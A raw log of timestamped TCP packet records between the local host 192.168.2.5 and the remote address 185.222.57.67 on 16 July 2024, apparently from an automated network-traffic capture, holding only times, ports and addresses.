Jul 16, 2024 19:57:17.818160057 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.818229914 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.818262100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.818552017 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.819067001 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.819375992 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.821497917 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821753025 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821801901 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821815014 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821841955 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821858883 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821862936 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.821882963 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.821897030 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821911097 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821922064 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821927071 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.821938992 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821966887 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.821988106 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822004080 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822055101 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822104931 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822159052 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822169065 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822293043 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822314024 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822364092 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822376013 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822407007 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822458982 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822458982 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822473049 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822500944 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822541952 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822557926 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822611094 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822623014 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822635889 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822657108 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822663069 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822709084 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822725058 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822753906 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822791100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822812080 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822819948 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822829962 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822843075 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822873116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822885036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822892904 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822941065 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.822992086 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.822994947 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823095083 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823210955 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823235035 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823293924 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823309898 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823317051 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823333025 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823340893 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823405027 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823417902 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823421955 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823430061 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823436975 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823465109 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823467016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823518991 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823520899 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823534012 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823561907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823599100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823602915 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823612928 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823652029 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823662996 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823677063 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823688984 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.823704004 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823718071 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.823883057 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.824364901 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824402094 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824557066 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824596882 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.824609041 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824645042 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.824661970 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824706078 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824743032 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.824754953 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824788094 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.824846029 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.824892998 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824908972 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824917078 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824932098 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.824943066 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825000048 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825180054 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825193882 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825222015 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825261116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825273037 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825279951 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825284958 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825297117 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825325012 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825337887 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825350046 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825350046 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825387955 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825395107 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825401068 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825429916 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825442076 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825442076 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825464010 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825489044 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825489998 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825506926 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825536013 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825572968 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825586081 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825598001 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825614929 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825634003 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825634003 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.825644016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825716019 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825769901 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825783014 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825798035 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825834036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825846910 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825882912 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825915098 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825927973 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825954914 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.825970888 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826749086 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826858997 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826895952 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826913118 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826960087 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826972961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.826988935 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827047110 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827063084 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827111006 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827166080 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827178001 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827188969 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827294111 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827306986 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827320099 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827336073 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827406883 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827419043 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827466965 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827480078 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827528000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827541113 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827802896 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827816010 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827912092 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.827924967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828032017 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828043938 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828135967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828226089 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828238010 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828249931 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828331947 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828345060 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828417063 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828429937 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828440905 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828455925 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828552008 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828579903 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828592062 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828619003 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828635931 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828756094 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828775883 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828860044 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.828996897 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829032898 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829049110 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829077005 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829149008 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829188108 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829225063 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829262972 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829291105 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829303980 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829319000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829346895 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829397917 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829411030 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829447031 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829461098 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829472065 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829520941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829533100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829560041 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829572916 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829605103 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829621077 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829711914 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829724073 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829740047 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829776049 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829803944 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829819918 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829857111 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829869986 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829896927 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829914093 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829951048 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829982996 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.829994917 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830030918 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830043077 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830095053 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830176115 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830193043 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830219984 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830270052 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830285072 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830312014 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830372095 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830384016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830414057 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830497026 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830545902 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830574036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830585957 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830616951 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830629110 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830723047 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830734968 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830750942 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830776930 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830856085 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830868959 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830899000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830975056 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.830982924 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831011057 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831023932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831049919 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831098080 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831110954 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831171036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831249952 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831267118 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831271887 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831279039 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831284046 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831338882 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831388950 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831393957 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831399918 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831494093 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831499100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831543922 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831548929 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831599951 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831654072 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831660032 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831674099 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831707954 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831720114 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831753016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831859112 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831865072 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831876993 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831883907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831921101 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831926107 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831938982 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.831968069 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832022905 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832036018 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832041025 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832075119 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832093000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832134008 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832139969 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832227945 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832272053 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832283974 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832288980 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832304001 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832312107 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832334995 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832385063 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832390070 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.832402945 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.638835907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.640649080 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.640861034 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.640938044 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.640997887 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641041994 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641098022 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641144991 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641207933 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641269922 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641328096 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641386986 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.641422987 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.646992922 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647038937 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647052050 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647074938 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647078991 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647108078 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647128105 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647138119 CEST	49720	55615	192.168.2.5	185.222.57.67
